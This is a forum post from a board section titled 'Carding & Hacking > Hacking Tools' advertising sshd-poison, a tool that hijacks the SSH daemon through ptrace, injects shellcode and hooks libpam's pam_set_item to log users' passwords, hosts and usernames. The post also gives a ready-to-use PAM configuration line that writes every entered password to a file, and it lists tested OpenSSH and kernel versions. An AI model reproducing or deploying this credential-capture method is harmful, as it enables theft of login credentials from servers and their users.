Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Hacking Tools
SSHD-Poison - A Tool To Get Creds Of Pam Based SSHD Authentication
Message
<blockquote data-quote="Jakesu" data-source="post: 328" data-attributes="member: 7"><p><strong>sshd-poison is a tool to get creds of pam based sshd authentication, this is not the easiest way to do that (you can create a pam module, or just add auth optional pam_exec.so quiet expose_authtok /bin/bash -c {read,-r,x};{echo,-e,"`env`\n$x"}>>somefile in a service configuration), not even the stealthiest (the tool don't have any mechanism to try hide yourself, and needs control the main sshd pid all the time), but code this gave me a lot of fun.</strong></p><p><strong></strong></p><p><strong>How it works</strong></p><p><strong>The tool starts attaching the main sshd pid and wait for some events, when a new process is created, it means that a new connection was started, after that the tool will wait for an execve event, then checks if the program executed is the same as the main pid, to ensure a re-exec (this is why we need take control of the main pid, every re-exec will erase any memory modification), then a breakpoint are set in the entry point of the new process, for wait the program load the shared librarys. When it's done and the breakpoint has hit, it are unset, the program will write the shellcode to a code cave, and the GOT entry for pam_set_item, used by libpam, will be changed, to hook internal libpam call to pam_set_item function.</strong></p><p><strong></strong></p><p><strong>The log format are password\0rhost\0user\0.</strong></p><p><strong>This will only works with x86_64 PIE binaries, and kernel 3.4 or early (PTRACE_SEIZE), I tested this with OpenSSH_8.0p1, OpenSSL1.1.1b 26 Feb 2019 with kernel 5.0.13-arch1-1-ARCH and OpenSSH_7.9p1 Debian-10, OpenSSL 1.1.1b 26 Feb 2019 with kernel 4.19.0-kali3-amd64</strong></p><p><strong>Compiling</strong></p><p></p><p><strong>make</strong></p><p><strong>Demo</strong></p><p><strong><a href="https://4.bp.blogspot.com/-gdCE7wEgJiY/XOS3wQ-feOI/AAAAAAAAO84/zSIx-Ti0I3MPi1IlcmgrHehYCmwERa8AACLcBGAs/s1600/sshd-poison_1_Peek%25252015-05-2019%25252011-25.gif" target="_blank"><img src="https://4.bp.blogspot.com/-gdCE7wEgJiY/XOS3wQ-feOI/AAAAAAAAO84/zSIx-Ti0I3MPi1IlcmgrHehYCmwERa8AACLcBGAs/s1600/sshd-poison_1_Peek%25252015-05-2019%25252011-25.gif" alt="" class="fr-fic fr-dii fr-draggable " style="" /></a></strong></p></blockquote><p></p>
[QUOTE="Jakesu, post: 328, member: 7"] [B]sshd-poison is a tool to get creds of pam based sshd authentication, this is not the easiest way to do that (you can create a pam module, or just add auth optional pam_exec.so quiet expose_authtok /bin/bash -c {read,-r,x};{echo,-e,"`env`\n$x"}>>somefile in a service configuration), not even the stealthiest (the tool don't have any mechanism to try hide yourself, and needs control the main sshd pid all the time), but code this gave me a lot of fun. How it works The tool starts attaching the main sshd pid and wait for some events, when a new process is created, it means that a new connection was started, after that the tool will wait for an execve event, then checks if the program executed is the same as the main pid, to ensure a re-exec (this is why we need take control of the main pid, every re-exec will erase any memory modification), then a breakpoint are set in the entry point of the new process, for wait the program load the shared librarys. When it's done and the breakpoint has hit, it are unset, the program will write the shellcode to a code cave, and the GOT entry for pam_set_item, used by libpam, will be changed, to hook internal libpam call to pam_set_item function. The log format are password\0rhost\0user\0. This will only works with x86_64 PIE binaries, and kernel 3.4 or early (PTRACE_SEIZE), I tested this with OpenSSH_8.0p1, OpenSSL1.1.1b 26 Feb 2019 with kernel 5.0.13-arch1-1-ARCH and OpenSSH_7.9p1 Debian-10, OpenSSL 1.1.1b 26 Feb 2019 with kernel 4.19.0-kali3-amd64 Compiling[/B] [B]make Demo [URL='https://4.bp.blogspot.com/-gdCE7wEgJiY/XOS3wQ-feOI/AAAAAAAAO84/zSIx-Ti0I3MPi1IlcmgrHehYCmwERa8AACLcBGAs/s1600/sshd-poison_1_Peek%25252015-05-2019%25252011-25.gif'][IMG]https://4.bp.blogspot.com/-gdCE7wEgJiY/XOS3wQ-feOI/AAAAAAAAO84/zSIx-Ti0I3MPi1IlcmgrHehYCmwERa8AACLcBGAs/s1600/sshd-poison_1_Peek%25252015-05-2019%25252011-25.gif[/IMG][/URL][/B] [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Hacking Tools
SSHD-Poison - A Tool To Get Creds Of Pam Based SSHD Authentication
Top